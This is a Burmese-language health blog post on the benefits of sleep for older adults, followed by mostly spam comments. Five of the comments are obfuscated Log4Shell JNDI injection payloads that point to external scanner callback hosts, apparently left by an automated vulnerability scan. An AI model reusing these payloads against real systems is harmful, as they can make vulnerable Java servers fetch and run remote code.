အသက်ကြီးသူများအတွက် အိပ်စက်ခြင်းဖြင့်ရရှိနိုင်မည့်အကျိုးကျေးဇူးများ
![]() |
အသက်ကြီးသူများအတွက် အိပ်စက်ခြင်းဖြင့်ရရှိနိုင်မည့်အကျိုးကျေးဇူးများ
လူတစ်ဦးခန္ဓာကိုယ် အပြောင်းအလဲများသည် အသက်အရွယ်အလိုက် ဖြစ်ပြီး အိပ်စက်ခြင်းနှင့် သက်ဆိုင်ခြင်းမရှိဟု ထင်တတ်ကြပါသည်။ အမှန်ကတော့ အသက်အရွယ်ကြီးမြင့်သူတွေလည်း လူငယ်များ ကဲ့သို့ အိပ်ချိန် ၇ နာရီ၊ ၈ နာရီလိုအပ်ပါသည်။ သို့သော်လည်း အသက် (၆၅ ) နှစ်အထက်ရှိ တဲ့ အသက်ကြီးမြင့်သူ ၄၆% သည် အိပ်စက်ရန်ခက်ခဲသည့် ပြဿနာကို နေ့စဉ်ပုံမှန်ကြုံတွေ့နေရသည်။
များစွာသော အချက်တွေက သက်ကြီးရွယ်အိုတွေအတွက် အိပ်စက်ခြင်းပြဿနာကို ဖြစ်စေပါသည်။ အသက်အရွယ်ကြီးလာသည်နှင့်အမျှကောင်းမွန်စွာ အိပ်ပျော်စေတဲ့ ဟော်မုန်းထုတ်လုပ်မှုနည်းသွားခြင်း၊ အချို့သော လူကြီးများသည် ပတ်ဝန်းကျင်ဆူညံသံများနှင့် အပူချိန်များကြောင့် ၎င်းတို့၏အိပ်စက်ခြင်းကို အနှောက်အယှက်ဖြစ်စေပါသည်။ အိပ်စက်ခြင်းကို ထိန်းချုပ်သောဦးနှောက်အပိုင်းမှာ ပါကင်ဆန်ရောဂါ သို့မဟုတ် လေဖြတ်ခြင်းကိုဖြစ်စေသည်။ အဆစ်ကိုက်ခဲခြင်းနှင့် အခြားကျန်းမာရေး အခြေအနေများ ကြောင့်အိပ်စက်ခြင်းကို အကျိုးသက်ရောက်မှုများရှိနိုင်သည်။
အသက်ကြီးသူများသည် အိပ်မပျော်ခြင်းကို ပုံမှန်ကြုံတွေ့ရလေ့ရှိပြီး စအိပ်ခြင်းမှာ အိပ်မပျော်ခြင်းထက် ညသန်းခေါင်ယံမှာ အိပ်မပျော်ခြင်းဖြစ်သည်။ အိပ်ရေးမဝခြင်းကြောင့် စိတ်အခြေအနေအပေါ် အကျိုးသက်ရောက်ခြင်းဖြစ်စေသကဲ့သို့ မှတ်ဉာဏ်ဆိုင်ရာပြဿနာများ နှင့် အားနည်းခြင်းများကိုလည်း ဖြစ်စေပါသည်။
ဤအချက်တွေကတော့ ကောင်းမွန်စွာအိပ်စက်ခြင်းကို ဖြစ်စေနိုင်မယ့်အချက်တွေပဲဖြစ်ပါသည်။ ဆရာဝန်နှင့်ပြသခြင်း၊ နေ့ခင်းဘက်မှာ အိပ်စက်ချိန်လျှော့ခြင်း၊ လေ့ကျင့်ခန်းပုံမှန်လုပ်ခြင်း၊ ကဖိန်းဓာတ်နှင့် အရက်လျော့ချခြင်း၊ အိပ်ခန်းနှင့် အိပ်ရာကို သက်တောင့်သက်သာရှိရန်ပြင်ဆင်ခြင်း စတဲ့အချက်တွေကို လုပ်ဆောင်ခြင်းဖြင့် ကောင်းမွန်စွာအိပ်စက်နိုင်ဖို့ အထောက်အကူပြုပါတယ်။
အောက်ဖော်ပြပါအကြောင်းပြချက်များအရ သက်ကြီးရွယ်အိုများအကြား အိပ်စက်ခြင်း၏ အရေးပါမှုများကို သိရှိနိုင်ပါသည်။
၁။ သူငယ်ပြန်ရောဂါ လျော့ကျစေခြင်း
American Geriatrics Society ဂျာနယ်တွင်ပါရှိသော လေ့လာမှုအရ အိပ်စက်ခြင်းသည် သူငယ်ပြန်ခြင်းနှင့် အရွယ်မတိုင်မီသေဆုံးခြင်း ကို ကာကွယ်ပေးပါသည်။ စာရေးသူများမှ သင့်လျော်သောအိပ်ချိန်ထိန်းသိမ်းခြင်း နှင့် ကောင်းမွန်သောကျန်းမာရေး အလေ့အထများသည် သက်ကြီးရွယ်အိုများတွင် စိတ်ဖောက်ပြန်မှုကို ကာကွယ်ရန်သိသာထင်ရှားသော နည်းလမ်းဖြစ်သည်ဟု ကောက်ချက်ချထားပါသည်။
၂။ တိုးတက်ကောင်းမွန်သော ကိုယ်ခံအားစနစ်
အိပ်စက်ခြင်းကြောင့် ခန္ဓာကိုယ်အတွက်လိုအပ်သော အားအင်များကိုရစေပြီး၊ နိုးလာတဲ့အခါ ၎င်းစွမ်းအင်များကို ပြန်လည်အသုံးပြုပြီး ဗိုင်းရပ်စ်နှင့် ကူးစက်ရောဂါများကို တိုက်ထုတ် ကာကွယ်ပေးနိုင်ပါတယ်။ အိပ်ရေးမဝခြင်းသည် ကိုယ်ခံအားစနစ်ကို ကျဆင်းစေတာကြောင့် အပြည့်အ၀ အနားယူခြင်းဖြင့် ကျန်းမာစွာနေထိုင်ရန် အလွန်အရေးကြီးပါသည်။
၃။ ပျက်စီးသွားတဲ့ ဆဲလ်များနှင့် တစ်ရှူးများကို ပြုပြင်ပေးခြင်း
အိပ်စက်ခြင်းသည် ကိုယ်ခံအားစနစ်ကို တိုးမြှင့်ပေးရုံသာမက နာကျင်ပင်ပန်းမှုများကိုလည်း သက်သာစေပါသည်။ ကျွန်ုပ်တို့ရဲ့ ခန္ဓာကိုယ်သည် အခြေခံအားဖြင့် တစ်နေ့တာရဲ့ပျက်စီးမှုကို ပြန်လည်ပြုပြင်ဖို့ စွမ်းအင်များ လိုအပ်ပါသည်။
၄။ ကျန်းမာသောကိုယ်အလေးချိန်ကို ထိန်းသိမ်းပေးခြင်း
အိပ်စက်ခြင်းနှင့် ဇီဝဖြစ်စဉ်ပြောင်းလဲမှုတို့သည် ဆက်စပ်နေပြီး ဦးနှောက်ရဲ့ တစ်နေရာထဲတွင် ထိန်းချုပ်ထားပါသည်။ အိပ်ပျော်စေသော ဟော်မုန်းနှင့် ဗိုက်ဆာခြင်းကို ဖြစ်စေတဲ့ ဟော်မုန်း အမျိုးအစားမှာ အတူတူပင်ဖြစ်ပါသည်။ လေ့လာမှု တစ်ခုအရ ကောင်းမွန်စွာ အိပ်စက်အနားယူစားသောက်သူများ သည် အိပ်ရေးမဝသူများထက် အဆီ ၅၆% ပိုမိုဆုံးရှုံးကြောင်းတွေ့ရှိရပါသည်။
၅။ အသက်ရှည်ခြင်း
အိပ်စက်ခြင်းက လူ့သက်တမ်းအပေါ်တွင် သက်ရောက်မှုများရှိစေပါသည်။ အိပ်စက်ချိန်နှင့် အသက်ရှည်ခြင်းတို့ အကြား အသိသာအထင်ရှားဆုံး လေ့လာမှုများထဲမှ တစ်ခုဖြစ်သည့် အိပ်ချိန် ၇ နာရီအထက်နှင့် ၅ နာရီခွဲအောက် အိပ်စက်ခြင်းသည် အသက်တိုစေကြောင်း လေ့လာတွေ့ရှိခဲ့ပါသည်။
1
Wow, awesome blog layout! How long have you been blogging for? you made blogging look easy. The overall look of your website is magnificent, let alone the content!
Hello.This article was really remarkable, especially since I was searching for thoughts on this matter last Friday.
Very interesting details you have observed, regards for posting.
It is really a great and useful piece of information. I’m glad that you shared this useful info with us. Please keep us informed like this. Thanks for sharing.
Some really nice and utilitarian information on this web site, also I conceive the pattern holds superb features.
Some times its a pain in the ass to read what website owners wrote but this site is very user genial! .
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://bbfa4c5311f440d597a33e0f16cc7ec414f2d422.33490225466067547.141495969.log4j05.log4j.us1.qualysperiscope.com./QualysWAS}
${jnd${123%ff:-${123%ff:-i:}}ldap://211b9397e17531114e741f8a7aa4b1d79b3c2cf8.33490225466067547.383641881.log4j07.log4j.us1.qualysperiscope.com./QualysWAS}
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//a982390ebcc4aed1f6f8c7c28c6a9be4af4ad290.33490225466067547.1390782654.log4j08.log4j.us1.qualysperiscope.com./QualysWAS}
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//7a9da3dc6038f02564063c004ac984234c13bdd8.33490225466067547.4048352980.log4j10.log4j.us1.qualysperiscope.com./QualysWAS}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://269bf82119a573445119f9494e20fce06c15a005.33490225466067547.4073339537.log4j12.log4j.us1.qualysperiscope.com./QualysWAS}
Hey! I could have sworn I’ve been to this site before but after reading through some of the post I realized it’s new to me. Nonetheless, I’m definitely glad I found it and I’ll be book-marking and checking back often!